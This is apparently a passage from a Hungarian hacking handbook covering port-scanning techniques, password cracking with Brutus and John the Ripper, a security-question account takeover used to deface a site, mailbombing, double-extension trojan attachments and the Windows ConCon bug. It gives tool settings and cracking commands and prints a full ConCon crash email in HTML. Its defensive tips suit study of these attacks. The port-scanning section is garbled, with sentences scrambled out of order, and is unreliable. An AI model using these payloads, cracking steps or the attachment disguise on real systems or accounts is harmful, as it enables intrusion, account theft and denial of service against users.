Emellett a portszkennelés arra is szolgál. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni. hogy milyen szolgáltatások futnak a rendszeren. A támadóknak azonban nem felel meg. amelyek mellett a feladatot meg kell oldani. lehetségesek-e anonim loginek. Éppen ezért a szkenner multi-socket eljárást alkalmaz.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz. hogy nagyon gyorsan vezet eredményre. és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. akkor nem fogják észrevenni ezt a szkennelést. 6.A rések keresése 6. Az mindenesetre biztos. Ebben az esetben a szkenner ismét ACK-val válaszol. A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit.1. és visszadják a rendszer válaszait. hiszen e szó jelentés itt az.2. hogy kitalálják. akkor SYN-ACK. No persze nem a hagyományos értelemben vett szkennelésről van szó. A szkennerek kérdéseket küldenek a portoknak. ha elérhető. RST-ACK. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). hogy minden időkeretet túllépne. Ennek az eljárásnak az előnye. Minden hacker elvégzi a portszkennelést a célrendszerén. mert nagyon feltűnő. többek között arról.mindkettő a Linux alatt gyökerezik. Az előnye viszont. amelynél egyidejűleg nagyon sok kérdést tud feltenni. különben nehezen érthetők az összefüggések. a host visszajelzése pedig. a hacker pedig észrevétlen szeretne maradni. és kérdéses lenne. hogy egy rendszer minél több csatolófelületét. 6.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap. Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. 6. akinek root-jogai . Ehhez a következőképpen járnak el: a szkenner. Ehhez minden fontos információ megtalálható a 3. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. Hogy ezek közül melyiket választják. A szkenner A szkenneléshez szükség van egy portszkennerre. A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. A legismertebb szkennerek közé tartozik a Nessus és az nmap . fejezetben. hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot. az azoktól a feltételektől függ. mielőtt munkához látna. de időközben már Windowshoz is kifejlesztették. A portszkennek a támadók legfontosabb eszközei. illetve portját szólítják meg. Ezért minden rendszergazdának jól kell ismernie a szkennereket.2. akkor az elérhetőnek számít. melyek engedik meg kapcsolat felépítését. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni.6 Szkennelés . Közben különböző információkat gyűjtenek.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. ha nem érhető el a port. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. hogy minden portot le lehet-e szkennelni. lehetőleg gyorsan. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához. és a kapcsolat létrejött. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát.

Connection refused üzenet helyett.2. amely a számítógépen fut. A FIN-csomagokat arra használják.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. és várunk egy UDP-ICMP-PORT-UNREACH üzenetre. amelyek nem feltűnőek. akik rootként vannak bejelentkezve.Try Again. Természetesen ez az eljárás is nagyon időigényes.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. Megvan tehát a cél. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni. illetve darabolódnak. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal. Ez az operációs rendszernél kezdődik. A szkennelésnek ez a módja nagyon hosszadalmas. a nyitottak ezt nem teszik. a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája. akik rootként vannak bejelentkezve. HTTP.2. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. Telnet. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést. akkor többnyire ezt az üzenetet kapjuk: Error 13 . 6. és másodszor. amit sajnos. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. akkor egy portlista segítségével lehet áttekintést kapni arról. a támadó utánanéz a megfelelő kihasználási lehetőségeknek.2. a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi. 6.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé. hiszen system admin jogok kellenek hozzá. A támadók most hozzákezdenének információkat gyűjteni a célrendszerről. mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést. Csak a lezárt port küld vissza egy üzenetet. az ICMP-ECHO-REPLY csomaggal válaszol. a normál Error 111 .) futnak a rendszeren. Tehát szkenneljük a portokat. amelynél csak azok a userek kapnak pozitív visszajelzést. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. Ez azt jelenti. 6. más protokollokkal ellentétben. hogy „érdekes" jelzéseket kapjon. HTTPS. stb. 6.8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. Aszerint. hogy a port nem elérhető. 6. Ez gondoskodik ugyanis arról.2. Ezek a „letapogatások" azonban csak Unix alatt működnek. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk). ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat. és gyakran megbízhatatlan. Ha a számok valamelyike mögött van egy rendszer.13-as hibánál a port le van zárva.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP. 6. hogy a számítógép kiadjon egy választ. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától. Ráadásul csak Linux alatt működik. A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. illetve rendszererőforrásaitól függ. hogy milyen szervizek (FTP. hogy melyik hostok elérhetők. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre. és azok a felhasználók. A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. nem látunk. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve. .2. nem igazolja vissza a fogadást. megkapják az ICMP PORT UNREACH üzeneteket.vannak.2. Ezen a módon lehet meggyőződni arról. hogy találjanak egy hostot. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. egyszer. hogy mégis kapjunk informatív visszajelzést . amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet.

9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés. hogy megtalálják és analizálják a célrendszerüket. amelyek nélkül a betörés lehetetlen volna. amelyet a betörők végrehajtanak. amint TCP-kapcsolatok érkeznek be. ameddig lehetséges. hogy azonosítani lehessen a lehetséges támadót. Természetesen nagyon nehéz valakit visszatartani attól. hogy ne kínáljunk támadási felületet. amelyek feljegyzik a portszkenneket. hogy egy rendszert szkenneljen. A tűzfalakat arra is be lehet állítani. Ez azonban többnyire nehezen kivitelezhető.6. inaktívan kellene tartani.2. Ezen keresztül számos fontos információt begyűjthetnek. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). Itt a tűzfalak segítenek. mint amilyen a Norton Internet Security. és megpróbálkoznak egy portra kapcsolódni. vagy portscan detektorok. ha valaki például egy FTP-szervert működtet a rendszerén. már akkor is. illetve naplóztatni a szkenneléseket. Ezért fontos védekezni a portszkennelés ellen. hogy figyelmeztető üzenetet küldjenek. ha a szkennelés nem talál nyitott portokat. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz. Tehát minden szolgáltatást. mint például a BlackICE. A legjobb védelem. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139. . port elérhetőségét (lásd.

4.1 7.4.4 External mód 7.1 7.2 Beállítások áttekintése 7.3.4.3.2 A szólista módszer 7.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.3 Incremental mód 7.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.7.4 Jelszavak megfejtése a John the Ripperrel 7.4. fejezet .4.5 A John legfontosabb parancsai 7.Tartalom 7.3 Hackelt security-site .2 7.6 A jelszófájl Single Mode .4.

A jelszófeltörésről oldalakat lehetne írni.de (a címeket az adatvédelem miatt megváltoztattuk). Tehát a hackernek más eszközökhöz kellett folyamodnia.de volt.kulcsszó: email-cím.de) szolgáltatónál szerepelt kontaktcímként. Hogy hogyan is működnek ezek a programok. A legfontosabb azonban az.puretec. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. És nézzenek oda: ez megint telitalálatnak bizonyult.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt. és látta. hogy milyen névről van szó. Ez történhet mondjuk egy telefonhívással. amivel ilyenkor eljárnak. amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni. A klasszikus jelszótörő egy olyan program. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. Kutatás közben megállapítot- Itt egy honlap volt . amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni.az első: várni pár napot egy mail-re a szolgáltatótól. A hacker a felhasználó születési dátumával kezdett.haennle@gmx.de.3 pontjából derül ki.haennle@gmx.denic. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. megváltoztatta a jelszót. 7. Tehát fogta Tobias-t. De ez biztosan feltűnne a felhasználónak. illetve feltörésére különböző lehetőségek vannak. mert ezekben szerepelt az ügyfélszám. hogy a webmesternek két GMX-fiókja van: tobias. A kreativitás. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni. egy ismert biztonsági és trójai információs oldal. hogy ismeretlenek olyan információkat csaljanak ki tőlünk. Az első címet kontaktcímként adta meg a weboldalon. amelyeket senkinek sem adnánk meg önként. így két lehetőség adódott . hogy egy jelszó ne legyen túl egyszerű. Természetesen a jelszófeltörők elleni legjobb védelem. Az áldozat. A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt.flieger@dmx. hihetetlen.thsecurity. Az egyik legfontosabb a Social Engineering.de és pegasuss. amelyekre a Social Enineeringhez szükség van. A támadó először megnézte a GMX-titkos kérdést. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval. tehát tobias. amelyet a GMX-adatokból megtudott. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat. az a fejezet 7.. és máris büszke tulajdonosa lett egy GMX-accountnak.7 Jelszófeltörés ta. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. De nem voltak mail-ek a szolgáltatótól.de) és a Puretec (www. amely egy lista segítségével minden lehetséges variációt megjátszik. Most egy kicsit körülnézett a GMX felhasználói menüben. A jelszavak kiderítésére. a második a Denic-nél (www. a www. Itt a következő történt. amire szüksége volt ahhoz. és a jelszóválasztás biztonságát a középpontba állítani. mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását. amelyben a főnökünk keresztnevét kérdezik . és megváltoztatná a kontaktcímét. hamar rájött. a „biztos jelszó" sem fog kimaradni. Tehát ne hagyjuk. amelyet egy m \ r3nda nevű hacker kinézett magának. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste.

• ne legyen szabványos. amíg megtalálják az igazit. A Brute Force annyit jelent: nyers erőszak. Ezután ki lehet választani a támadás fajtáját. 7. mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. A jelszót kettő-négy hetente cserélni kell. A jelszót a legritkább esetben fejtik vissza. Az internetjelszavak minden fajtájához szívesen használják. POP3. kml34Hs9. HTTP. tehát ne legyen „hhaalloo". NetBios stb. hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés. A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb. • a jelszó egy fájlban van mentve a gépen. Egy példa az ilyesfajta programra a Brutus. ehelyett egy névről nagyon jól ismert eljárást.és nagybetűkből állnak. A jó jelszavak • több mint tíz karakterből. • egy cetlit teszünk a billentyűzet alá vagy a monitorra. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás. hogy a felhasználónak lehetővé tegyék. pl.). amelyek benne lehetnek a jelszólistákban vagy a szótárakban. megváltoztatni a jelszavát. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét. hogy ki kerüljék az alkalmazott biztonsági intézkedéseket. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után. E programok nem tesznek mást. • vegyesen kis. . • semmi születési dátum és hasonlók. az alkalmatlan jelszó révén. A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere.Ez bizony egy nagyon jó példa arra. és ráírjuk a jelszót. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. ha • mindenütt ugyanazt a jelszót használjuk. • semmi duplázás. 7. • ne legyenek olyan szavak.2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. ha elfelejtette. • alfanumerikus karaktersorból. amelyek jelszavakat fednek fel. a Brute Force-ot használják. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP.3 A jelszófeltörők A jelszófeltörők olyan programok. Telnet.

a program ennél az eljárásnál csak egy user névvel próbálkozik. FTP. a rendelkezésre álló processzor sebességétől függ. Az idő. Pass Fik: words. combo-listával vagy Brute Force-szal. akkor visszafejtve is egyezniük kell. amelyen pl. HTTP esetén a 80-as port. Connection: meg lehet adni. Type: itt lehet kiválasztani a cél típusát. a Brutus itt lehetővé teszi egy proxy bejegyzését. Fercsi stb. a POP3 vagy FTP-account van. A John the Ripper szerény felhasználói felülete 7.4.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni. amely megakadályozza. Egy további. igencsak megrövidítik a feltörést. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. és az eredményt összehasonlítja a megfejtendő jelszóval.). amelyet előre meg lehet adni. Jóska. hogy a jelszavakat eltávolítja a passwd fájlból. POP3. pl: lol@gmx. ha elfelejtettük a fiók-jelszavunkat. ha a jelszó a listán van. external). hogy vissza lehessen követni a támadót. és helyette a shadow-fájlban tárolja). hogy mennyi idő múlva szakítsa meg a program a kapcsolatot.1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). Itt lehet egy szólistát betölteni.3. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése. mert az már ismert.txt. a támadásokhoz hasznos tulajdonság egy beépített proxy. de nincs meg a hozzá tartozó jelszó. a . ezért a program egyes verziói különböző processzorokra optimalizáltak. amelyeket a Brutus mellékel. Pass Mode: szólista. itt lehet kiválasztani. SMB (NetBOIS) stb. hogy milyen módban indult el (single. Use Username: kiválasztva. Lehet szólistával. incremental. Single User: kiválasztva User ID: usernév (pl. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták.3. Use Proxy: nincs kiválasztva. például név. Itt lehet egy névlistát választani különböző user nevekből.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. szólista. amely úgy működik. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. Telnet. hogy milyen gyakran létesítsen kapcsolatot a program. hogy a megadott jelszólehetőségeket például DES-sel kódolja. A John működése azon alapul. Method: HEAD KeepAlive: megjelölve. telefonszám stb. 7. aszerint. amelyek. 7. Így lenne ez például akkor is. amelyet a Brutus mellé adnak. Ha a jelszavak kódolt állapotban egyeznek.het tölteni. HTTP. Timeout: megadható. FTP-nél a 21-es. 7. jelszóként felhasználni. hogyan történjen a feltörés.net.. Port: a port megadása.4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő. azaz a userek személyes adatait.

4. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza. Ezt az eljárást Brute Force-nak is nevezik.4. számokból vagy kombinációkból áll. mégpedig úgy. hogy minden lehetséges kombinációt ellenőriz. EXTERNAL: előtt definiált MODE tulajdonságokkal.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. csak arra kell figyelni. 7.4.3 Incremental mód Ez a John leghatalmasabb üzemmódja. amelyek a szólisták kezelésében segítenek. akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:).4.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. mert minden rendkelkezésre álló információt fel lehet használni. hogy minden sorban csak egyetlen karakterfüzér legyen. adminspecifikus szólistákat előállítani. Ez a parancs szólista módban indítja a Johnt. függetlenül attól. majd szólista. az nem túl lényeges.ill. És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz.GECOS-információk azonban még mindig a passwd fájlban vannak. ezért nem szabad alábecsülni. Hogy hány ilyen pár van a fájlban tárolva. vagy eltávolítják a dupla bejegyzéseket). mert a John egy kicsikét gyorsabban dolgozik. Erre a parancsra mutatja meg a program a megfejtett jelszavakat. ha a felhasználók személyes információikat használják jelszóként.4 External mód Ez a mód inkább tapasztalt felhasználóknak való. a USERNAME: PASSWORD séma szerint kell tárolni. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. Ez a mód természetesen csak akkor hatékony. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok. például több listát összefűznek. A jelszavak „árnyékolva" sem lehetnek. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként. hogy a szólista ábécé-sorrendben legyen. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen.4. John fájlnév John -show Ez a parancs először single. kódolva=john:GjstuOeYjOEhc). így lehet szerver. ábécé-sorrendbe rendezik. hogy a szükséges idő (a processzor teljesítményétől. hogy betűkből. végül incremental módban futtatja le a Johnt. A szólistát úgy kell felépíteni.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7. 7. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* . mert teljes mértékben konfigurálni kell. Minden létező jelszót. hogy összevezeti a passwd fájlt és a shadow fájlt. Ez a parancs incremental módban indítja a Johnt. A john parancs kilistáz minden lehetséges paramétert. Arra is ügyelni kell. és ezzel a siker valószínűségét növelni. vissza tud fejteni úgy. Ez a módszer egyben nagyon gyors is. különleges karakterekből. a szólista német részét ebben az esetben el lehet hagyni. a LIST. Ebben az esetben az Unshadow program segít. Minden parancs után meg kell még adni a jelszófájlt is. Ha a single módot kell használni. Ez a parancs external módban indítja a Johnt. 7. Ezeket kettősponttal elválasztva. Azt mindenesetre figyelembe kell venni. . 7.

2 Milyen biztonsági rések vannak? .2 A fájlmelléklet kitömése 8.1.8.1 E-mail-támadások 8.1.biztonsági kockázat? 8.2 ICQ .praktikus és veszélyes 8. fejezet .2.2.1 Az ICQ .Tartalom 8.1.1 Mailbombák .3 AConConbug 8.túlcsordul a postafiók 8.

1. ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre.1 Mailbombák . a szerver vissza fogja utasítani. ezt pedig a hackerek kihasználják a rendszerek megtámadásához. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó. Ennek természetesen az a következménye. vagy . Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. Az interneteléréssel azonban növekednek azok a veszélyek. hogy a mailbomba-támadások mögött mennyire van stratégia.1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten. hogy a címzett postafiókja hamar túllépi a maximális kapacitását. hogy egy fontos mail-re vár. Ennek alapján nem nyújtanak lehetőséget arra. Ebben a tényben azonban veszélyek is rejlenek. akkor bosz- . Kiderül. mivel a mailbox a támadás miatt túltelítődik. aki nem kapja meg a megrendelés-maileket.választás szerint hamis feladócímet is meg tudnak adni.lehet. A különböző trójai.és drága . Ugyanis elég időigényes . A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. hogy a feladó adatait ellenőrizni lehessen. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik. amelyek sok felhasználóban nem is tudatosulnak. hogy anonimek maradnak. 8. 8. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. sőt még arra is van mód. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket.és víruslehetőségekről itt már nem beszélünk. hanem abban is.8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. E-mail-bombázó Arzytól szánthatják. amelyeknek fontos kommunikációs eszközt jelent az internet. Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét. hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen. A legtöbbek életéből már nem maradhat ki ez a médium. egyre újabb és újabb szolgáltatásokat kínálnak a számukra. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg. tehát csak egyszerű szöveget szállítanak.túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. és a tartalmak is mind vonzóbbakká válnak. ha tudják. Nehéz felmérni. mert mailbomba-támadás áldozata lett. inkább csak idegölők és zavarók. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve. és nem tud több mail-t fogadni. Ezt ugyanis. A mailbombázáshoz a támadók számos programból választhatnak. ezeket az adott témának szentelt fejezetek tárgyalják. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat.

hogy előzőleg a merevlemezre kellene menteni.egy mail kipufferolt fájlmelléklete .BAT nevű mail-mellékletek veszélyesek lehetnek. hogy álcázzák a csatolt fájlt. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja.COM. A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli. az úgynevezett spam-et. amelyek. Általánosságban érvényes.doc-ot mutatja. a mailbombázó programoknak több szerverrendszert is meg kell adni. a következőképpen néz ki: Profil. hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz. *. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre.így működnek a mailbombák Ahhoz. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne. Természetesen ebben az esetben azonnal elindul a megfelelő program. Ez megakadályozza. Ezen kívül a Microsoft a http://windowsupdate. és a munkát felosszák több különböző szerver között. hogy csak egy hagyományos Word-dokumentumról van szó. Figyelmeztető üzenet az Outlooktól. anélkül. felhasználói biztosan jól ismerik az előbb említett mailreklámot. a merevlemezre mentve.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil. mint az AOL vagy a GMX.microsoft. az akaratuk ellenére. A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót.com/ címen egy Outlook-frissítést is kínál. még Word-ikont is tud varázsolni. amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál.1. és feltelepül az esetleg hozzáfűzött vírus vagy trójai. hogy a címzetteknek továbbítsák a mail-eket. *. postásként fognak működni. hogy felgyorsítsák az akár 10 ezer mail továbbítását. A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal. Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. 8. hogy az *.EXE. Ezért gyakran egy trükkhöz folyamodnak. mint a Sub7 (lásd a trójaiakról szóló fejezetet). amit közvetlenül is meg lehet nyitni az Outlookból. amelyek agresszív reklámjaikkal tűnnek fel az interneten. A csatolt fájl. így a felhasználó feltételezheti. Ezt egyébként azért teszik. Ártatlannak tűnik .

Egy példa erre a híres Windows ConCon bug. "Comic Sans MS". amely a foglalt eszköznevek meghívására vonatkozik.=20 } hl . hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben. aminek az a következménye." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. DD. amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html.8.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz. BLOCKQUOTE.charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300. A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül.de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. és újra kell indítani a PC-t. de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. DT. ADDRESS.3110. font-size: 24pt. Az is ismert. A ConCon „nagy kék halált" okoz. font-family: "Tempus Sans ITC". font-weight: regular. font-family: "Tempus Sans ITC". hogy újra kell installálni az operációs rendszert. OL.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp. UL. "Arial". "Ariar. BR. P.72. font-weight: regular.gif> <P>Üzenetet ide beilleszteni. Ez veszélyes lehet a nem mentett adatok miatt.telekabel. } ? { </STYLE> <META content=3D'"MSHTML 4.1.=20 } hl { color: FF3300. "Comic Sans MS". PRE. = LI { color: FF3300. "Comic Sans MS". font-family: "Tempus Sans ITC". font-weight: regular.3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk. Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül. font-size: 30pt. DIR. MENU. DIV. font-size: 20pt. "Arial".

1. amelyek kikerülik ezeket a beállításokat. amely. A kapcsolati listára minden felhasználót bejegyezhetünk. Manapság már majdnem 150 millió szám létezik. Ezeket a hálóról származó eszközökkel lehet végrehajtani. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. 3. és kapcsolatba léphetünk vele. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat. Ha egy másik felhasználót keresünk. A felhasználóknak észnél kell lenniük. hogy a számítógép lefagyjon. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt.2 ICQ . Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. ofíline-ban. hogy csak a fontosabbakra szorítkozzunk. hogy „Nem. és a kérdésre. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek. amelyek biztonsági kockázatként jelölik meg az ICQ-t. miután nagyon kényelmes és felhasználóbarát. Ezek közül is egyértelműen az IP a legfontosabb.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. és újra kelljen indítani. sőt MacOS-hoz és BeOS-hoz is van ilyen.com/downloads/release. hogy a támadónak információkat szolgáltat az áldozatról.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. Ezért ez sem jelent biztos védelmet. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. A státuszon lehet látni. hogy pillanatnyilag békén hagyják. amelyen a kliens fut. 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. 8. egyszerűen a Find User alatt megadjuk a nevét.Ezt a mailt elég kijelölni 